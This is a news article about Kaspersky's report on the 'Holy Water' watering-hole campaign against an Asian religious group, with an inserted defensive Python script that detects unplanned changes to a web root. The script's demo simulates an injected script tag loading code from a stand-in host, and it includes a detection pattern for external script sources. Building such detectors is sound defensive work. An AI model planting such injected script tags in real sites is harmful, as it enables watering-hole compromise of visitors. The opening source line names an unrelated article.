Article source: https://www.darkreading.com/attacks-breaches/data-from-52m-marriott-loyalty-program-members-hit-by-breach/d/d-id/1337453?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Researchers Uncover Unsophisticated – But Creative – Watering Hole Attack

Holy Water campaign is targeting users of a specific religious and ethnic group in Asia, Kaspersky says.

A new malware distribution campaign targeted at users in Asian countries is the latest reminder of why attacks don’t always have to be sophisticated to be effective.

The campaign involves the use of watering-hole websites to drop malware on systems belonging to members of a certain Asian religious and ethnic group. The watering holes have been established on more than 10 websites belonging to individuals, voluntary programs, charities, and other organizations related to the targeted religious group. All that users need to do for malware to be downloaded on their systems is visit one of the compromised websites.

Researchers from Kaspersky first spotted the campaign last December and have named it “Holy Water.” In an advisory this week, the security vendor described the campaign as ongoing and involving the use of an unsophisticated but creative toolset that includes open source code, GitHub distribution, and the use of Go language and Google Drive-based command and communication channels.

According to Kaspersky, when a visitor lands on one of the watering holes, an already compromised component on it loads a malicious JavaScript that harvests information about the visitor’s system and sends it off to an external attacker-controlled server. The external server vets the system information to determine whether the user is of potential interest.

If the user is identified as being of interest, another JavaScript loads a plugin that in turn triggers a pop-up urging the user to update their Adobe Flash software. Users who click on the pop-up end up having a backdoor called “Godlike12” installed on their systems. The malware allows the threat actor to take complete remote control of the infected device to steal sensitive data, modify files, gather logs, and conduct other malicious activity, Kaspersky said.

The threat group behind the campaign has also been using a second, modified version of an open source Python backdoor named “Stitch” in the attacks. This backdoor provides the attackers a way to exchange encrypted information with the command-and-control server, the security vendor said in its alert.

Ivan Kwiatkowski, senior security researcher at Kaspersky, says the motive for the Holy Water campaign remains unclear. But it is almost certainly not financially motivated. “Based on the extreme focus of this campaign, we assert that their objective was to gather intelligence on the target population,” he says.

Creative Tactics
What makes the campaign different is how creative the attackers have been in their choice of tools, Kwiatkowski says. The Holy Water campaign has been leveraging free, third-party services instead of a proper infrastructure and made use of modified open source backdoors in its early phases.

“To us, this indicates that the attackers had to work with limited funding but were able to find ways to conduct their operations anyway,” he says.

None of the tools that Kaspersky found the group using contain any state-of-the-art features. “But it is obvious that the group behind this campaign was able to achieve operational efficiency in a short time span,” he says.

Kwiatkowski says Kaspersky has not been able to determine how the attackers initially compromised the websites that are being used as watering holes and planted malware on them. It is likely, though, that they exploited some software vulnerability. All of the water-holed websites that Kaspersky discovered were running WordPress, and a few of them were also hosted on the same IP address, he says.

Kaspersky has also not been able to confirm what information exactly the attackers are looking for in order to determine whether a visitor to one of the watering-hole websites is of interest to them. But based on the system information that is sent to the remote server, it appears the attackers are choosing their victims based on where they are located geographically.

The Holy Water campaign is a reminder why website administrators should keep their software stack up-to-date and have controls for detecting traces of compromise on their machines. “In the case of water-holing attacks, we recommend that measures are taken to detect any unplanned modification to the website’s pages,” Kwiatkowski says.

Websites that support at-risk communities need to pay attention to such campaigns as well, he adds. “[Such sites] are liable to be targeted as well because they are, in a way, access vectors to potential victims,” Kwiatkowski says.
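The chain described above (a compromised page quietly gains a script that loads from an attacker-controlled host) and the recommendation to detect unplanned modification to a site’s pages both come down to the same defensive control: keep a hash baseline of the web root and alert on any page that changes, then inspect changed HTML for script sources outside the site’s own allowlist. The following is an added example, not Kaspersky’s tooling and not code from the original article. It assumes the site’s files are on local disk, a constructed two-file sample site, a constructed injected script host (`unknown-host.example`), and an allowlist of known-good script hosts that the operator maintains.

```python
"""Baseline-and-compare integrity check for a web root, with a
watering-hole-specific heuristic: changed HTML that references an
external script host not on the allowlist is flagged.
Added example; sample site and hostnames below are constructed."""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Set, Tuple

# Matches <script ... src="http(s)://host/..."> or scheme-relative "//host/...".
# Relative sources such as "/js/app.js" do not match, so same-origin scripts are ignored.
EXTERNAL_SCRIPT_RE = re.compile(
    r'<script[^>]+src=["\'](https?:)?//([^/"\']+)', re.IGNORECASE
)
PAGE_SUFFIXES = {".html", ".htm", ".php"}


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large assets do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(web_root: Path) -> Dict[str, str]:
    """Map every file under web_root (relative POSIX path) to its hash."""
    return {
        p.relative_to(web_root).as_posix(): hash_file(p)
        for p in sorted(web_root.rglob("*"))
        if p.is_file()
    }


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files added, removed or modified since the baseline was taken."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(k for k in common if baseline[k] != current[k]),
    }


def external_script_hosts(html: str, allowed_hosts: Set[str]) -> List[str]:
    """Hosts referenced by <script src> that are not on the operator's allowlist."""
    hosts = {m.group(2).lower() for m in EXTERNAL_SCRIPT_RE.finditer(html)}
    return sorted(h for h in hosts if h not in allowed_hosts)


def audit(web_root: Path, baseline: Dict[str, str],
          allowed_hosts: Set[str]) -> Tuple[Dict[str, List[str]], List[str]]:
    """Diff the web root against the baseline and inspect changed pages."""
    diff = compare(baseline, build_baseline(web_root))
    findings = []
    for rel in diff["added"] + diff["modified"]:
        page = web_root / rel
        if page.suffix.lower() not in PAGE_SUFFIXES:
            continue
        for host in external_script_hosts(page.read_text(errors="replace"), allowed_hosts):
            findings.append(f"{rel}: references script host {host} not in allowlist")
    return diff, findings


def demo() -> Tuple[Dict[str, List[str]], List[str]]:
    """Constructed scenario: take a baseline, then simulate an unplanned change."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "js" / "app.js").write_text("console.log('ok');")
        (root / "index.html").write_text('<html><script src="/js/app.js"></script></html>')
        baseline = build_baseline(root)

        # Unplanned change (constructed): an injected external script and a new file.
        (root / "index.html").write_text(
            '<html><script src="/js/app.js"></script>'
            '<script src="//unknown-host.example/t.js"></script></html>'
        )
        (root / "wp-content").mkdir()
        (root / "wp-content" / "unexpected.php").write_text("<?php echo 'x'; ?>")

        return audit(root, baseline, allowed_hosts={"www.example.com"})


if __name__ == "__main__":
    diff, findings = demo()
    print(diff)       # {'added': ['wp-content/unexpected.php'], 'removed': [], 'modified': ['index.html']}
    print(findings)   # ['index.html: references script host unknown-host.example not in allowlist']
```

In practice the baseline would be regenerated only as part of a planned deployment and stored off the web server, so an intruder who can write to the document root cannot also rewrite the reference hashes; the allowlist is the short list of CDN and analytics hosts the site legitimately loads, and any host outside it in a changed page is worth a human look even when the change itself was expected.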


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/attacks-breaches/researchers-uncover-unsophisticated---but-creative---watering-hole-attack/d/d-id/1337455?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple